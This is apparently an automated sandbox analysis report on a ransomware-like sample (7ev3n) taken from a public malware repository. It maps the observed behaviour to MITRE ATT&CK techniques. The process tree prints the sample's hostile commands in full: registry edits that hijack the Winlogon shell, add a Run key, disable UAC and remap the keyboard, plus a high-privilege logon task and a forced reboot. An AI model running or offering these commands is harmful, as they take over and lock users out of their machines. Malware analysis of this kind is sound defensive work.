hxxps://github[.]com/Endermanch/MalwareDatabase

max time kernel
97s
max time network
101s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
25-08-2024 00:56

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

https://github.com/Endermanch/MalwareDatabase

Score

10^/10

discovery evasion persistence trojan

Malware Config

Signatures

Modifies WinLogon for persistence 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Local\\system.exe"	reg.exe

UAC bypass 3 TTPs 1 IoCs
evasion trojan

Bypass User Account Control
T1548.002

Disable or Modify Tools
T1562.001

Modify Registry
T1112

Processes:

reg.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe
Executes dropped EXE 1 IoCs

Processes:

system.exe

pid process

5796 system.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

pid	process
5796	system.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System = "C:\\Users\\Admin\\AppData\\Local\\system.exe"	reg.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

91 raw.githubusercontent.com
89 raw.githubusercontent.com
90 raw.githubusercontent.com
Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

flow	ioc
91	raw.githubusercontent.com
89	raw.githubusercontent.com
90	raw.githubusercontent.com

System Location Discovery: System Language Discovery 1 TTPs 20 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

cmd.execmd.exeSCHTASKS.execmd.exereg.execmd.exereg.exereg.exereg.execmd.exeshutdown.exe[email protected]cmd.execmd.exereg.exereg.exesystem.execmd.execmd.exereg.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SCHTASKS.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	shutdown.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	system.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 17 IoCs

Processes:

LogonUI.exechrome.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM	LogonUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133690210353934429"	chrome.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "66"	LogonUI.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent	LogonUI.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"	LogonUI.exe

Modifies registry class 1 IoCs

Processes:

chrome.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings chrome.exe
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

SCHTASKS.exe

pid process

2352 SCHTASKS.exe
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

chrome.exe

pid process

444 chrome.exe
444 chrome.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs

Processes:

chrome.exe

pid process

444 chrome.exe
444 chrome.exe
444 chrome.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings	chrome.exe

pid	process
2352	SCHTASKS.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

chrome.exe

description	pid	process
Token: SeShutdownPrivilege	444	chrome.exe
Token: SeCreatePagefilePrivilege	444	chrome.exe
Token: SeShutdownPrivilege	444	chrome.exe
Token: SeCreatePagefilePrivilege	444	chrome.exe
Token: SeShutdownPrivilege	444	chrome.exe
Token: SeCreatePagefilePrivilege	444	chrome.exe
Token: SeShutdownPrivilege	444	chrome.exe
Token: SeCreatePagefilePrivilege	444	chrome.exe
Token: SeShutdownPrivilege	444	chrome.exe
Token: SeCreatePagefilePrivilege	444	chrome.exe
Token: SeShutdownPrivilege	444	chrome.exe
Token: SeCreatePagefilePrivilege	444	chrome.exe
Token: SeShutdownPrivilege	444	chrome.exe
Token: SeCreatePagefilePrivilege	444	chrome.exe
Token: SeShutdownPrivilege	444	chrome.exe
Token: SeCreatePagefilePrivilege	444	chrome.exe
Token: SeShutdownPrivilege	444	chrome.exe
Token: SeCreatePagefilePrivilege	444	chrome.exe
Token: SeShutdownPrivilege	444	chrome.exe
Token: SeCreatePagefilePrivilege	444	chrome.exe
Token: SeShutdownPrivilege	444	chrome.exe
Token: SeCreatePagefilePrivilege	444	chrome.exe
Token: SeShutdownPrivilege	444	chrome.exe
Token: SeCreatePagefilePrivilege	444	chrome.exe
Token: SeShutdownPrivilege	444	chrome.exe
Token: SeCreatePagefilePrivilege	444	chrome.exe
Token: SeShutdownPrivilege	444	chrome.exe
Token: SeCreatePagefilePrivilege	444	chrome.exe
Token: SeShutdownPrivilege	444	chrome.exe
Token: SeCreatePagefilePrivilege	444	chrome.exe
Token: SeShutdownPrivilege	444	chrome.exe
Token: SeCreatePagefilePrivilege	444	chrome.exe
Token: SeShutdownPrivilege	444	chrome.exe
Token: SeCreatePagefilePrivilege	444	chrome.exe
Token: SeShutdownPrivilege	444	chrome.exe
Token: SeCreatePagefilePrivilege	444	chrome.exe
Token: SeShutdownPrivilege	444	chrome.exe
Token: SeCreatePagefilePrivilege	444	chrome.exe
Token: SeShutdownPrivilege	444	chrome.exe
Token: SeCreatePagefilePrivilege	444	chrome.exe
Token: SeShutdownPrivilege	444	chrome.exe
Token: SeCreatePagefilePrivilege	444	chrome.exe
Token: SeShutdownPrivilege	444	chrome.exe
Token: SeCreatePagefilePrivilege	444	chrome.exe
Token: SeShutdownPrivilege	444	chrome.exe
Token: SeCreatePagefilePrivilege	444	chrome.exe
Token: SeShutdownPrivilege	444	chrome.exe
Token: SeCreatePagefilePrivilege	444	chrome.exe
Token: SeShutdownPrivilege	444	chrome.exe
Token: SeCreatePagefilePrivilege	444	chrome.exe
Token: SeShutdownPrivilege	444	chrome.exe
Token: SeCreatePagefilePrivilege	444	chrome.exe
Token: SeShutdownPrivilege	444	chrome.exe
Token: SeCreatePagefilePrivilege	444	chrome.exe
Token: SeShutdownPrivilege	444	chrome.exe
Token: SeCreatePagefilePrivilege	444	chrome.exe
Token: SeShutdownPrivilege	444	chrome.exe
Token: SeCreatePagefilePrivilege	444	chrome.exe
Token: SeShutdownPrivilege	444	chrome.exe
Token: SeCreatePagefilePrivilege	444	chrome.exe
Token: SeShutdownPrivilege	444	chrome.exe
Token: SeCreatePagefilePrivilege	444	chrome.exe
Token: SeShutdownPrivilege	444	chrome.exe
Token: SeCreatePagefilePrivilege	444	chrome.exe

Suspicious use of FindShellTrayWindow 41 IoCs

Processes:

chrome.exe

pid	process
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe

Suspicious use of SendNotifyMessage 32 IoCs

Processes:

chrome.exe

pid	process
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

LogonUI.exe

pid process

5956 LogonUI.exe

pid	process
5956	LogonUI.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

chrome.exe

description	pid	process	target process
PID 444 wrote to memory of 1460	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 1460	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 4884	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 4884	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 4884	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 4884	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 4884	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 4884	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 4884	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 4884	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 4884	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 4884	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 4884	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 4884	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 4884	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 4884	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 4884	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 4884	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 4884	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 4884	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 4884	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 4884	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 4884	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 4884	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 4884	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 4884	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 4884	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 4884	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 4884	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 4884	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 4884	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 4884	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 4516	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 4516	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 1684	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 1684	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 1684	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 1684	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 1684	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 1684	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 1684	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 1684	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 1684	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 1684	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 1684	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 1684	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 1684	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 1684	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 1684	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 1684	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 1684	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 1684	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 1684	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 1684	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 1684	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 1684	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 1684	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 1684	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 1684	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 1684	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 1684	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 1684	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 1684	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 1684	444	chrome.exe	chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://github.com/Endermanch/MalwareDatabase
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:444
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff8749fcc40,0x7ff8749fcc4c,0x7ff8749fcc58
  2⤵
  PID:1460
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1900,i,356356149280091618,5960749462022339558,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=1896 /prefetch:2
  2⤵
  PID:4884
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2172,i,356356149280091618,5960749462022339558,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=1724 /prefetch:3
  2⤵
  PID:4516
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2252,i,356356149280091618,5960749462022339558,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2408 /prefetch:8
  2⤵
  PID:1684
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3124,i,356356149280091618,5960749462022339558,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3172 /prefetch:1
  2⤵
  PID:3408
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3140,i,356356149280091618,5960749462022339558,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3196 /prefetch:1
  2⤵
  PID:3980
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4564,i,356356149280091618,5960749462022339558,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4360 /prefetch:8
  2⤵
  PID:556
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4668,i,356356149280091618,5960749462022339558,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5024 /prefetch:1
  2⤵
  PID:6132
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4696,i,356356149280091618,5960749462022339558,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3264 /prefetch:8
  2⤵
  PID:4008

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:4608

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:4456

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4376,i,11708048364682646792,608099842549576907,262144 --variations-seed-version --mojo-platform-channel-handle=4088 /prefetch:8
1⤵
PID:5436

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5412

C:\Users\Admin\AppData\Local\Temp\Temp1_7ev3n.zip\[email protected]
"C:\Users\Admin\AppData\Local\Temp\Temp1_7ev3n.zip\[email protected]"
1⤵
- System Location Discovery: System Language Discovery
PID:5764
- C:\Users\Admin\AppData\Local\system.exe
  "C:\Users\Admin\AppData\Local\system.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:5796
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\del.bat
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2476
- - C:\Windows\SysWOW64\SCHTASKS.exe
    C:\Windows\System32\SCHTASKS.exe /create /SC ONLOGON /TN uac /TR "C:\Users\Admin\AppData\Local\bcd.bat" /RL HIGHEST /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:2352
- - C:\windows\SysWOW64\cmd.exe
    C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5960
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
      4⤵
      Modifies WinLogon for persistence
      System Location Discovery: System Language Discovery
      PID:5228
- - C:\windows\SysWOW64\cmd.exe
    C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "System" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5992
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "System" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
      4⤵
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      PID:1060
- - C:\windows\SysWOW64\cmd.exe
    C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:64
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5940
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:64
      4⤵
      System Location Discovery: System Language Discovery
      PID:5328
- - C:\windows\SysWOW64\cmd.exe
    C:\windows\system32\cmd.exe /c REG ADD "HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys" /v "Flags" /t REG_SZ /d 506 /f /reg:64
    3⤵
    - System Location Discovery: System Language Discovery
    PID:6056
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys" /v "Flags" /t REG_SZ /d 506 /f /reg:64
      4⤵
      System Location Discovery: System Language Discovery
      PID:5836
- - C:\windows\SysWOW64\cmd.exe
    C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "rgd_bcd_condition" /t REG_SZ /d 1 /f /reg:64
    3⤵
    - System Location Discovery: System Language Discovery
    PID:6072
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "rgd_bcd_condition" /t REG_SZ /d 1 /f /reg:64
      4⤵
      System Location Discovery: System Language Discovery
      PID:5312
- - C:\windows\SysWOW64\cmd.exe
    C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f /reg:64
    3⤵
    - System Location Discovery: System Language Discovery
    PID:6076
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f /reg:64
      4⤵
      UAC bypass
      System Location Discovery: System Language Discovery
      PID:5276
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "crypted" /t REG_SZ /d 1 /f /reg:64
    3⤵
    - System Location Discovery: System Language Discovery
    PID:6032
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "crypted" /t REG_SZ /d 1 /f /reg:64
      4⤵
      System Location Discovery: System Language Discovery
      PID:5708
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c shutdown -r -t 10 -f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5596
  - - C:\Windows\SysWOW64\shutdown.exe
      shutdown -r -t 10 -f
      4⤵
      System Location Discovery: System Language Discovery
      PID:5004

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa38d5855 /state1:0x41c64e6d
1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:5956

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

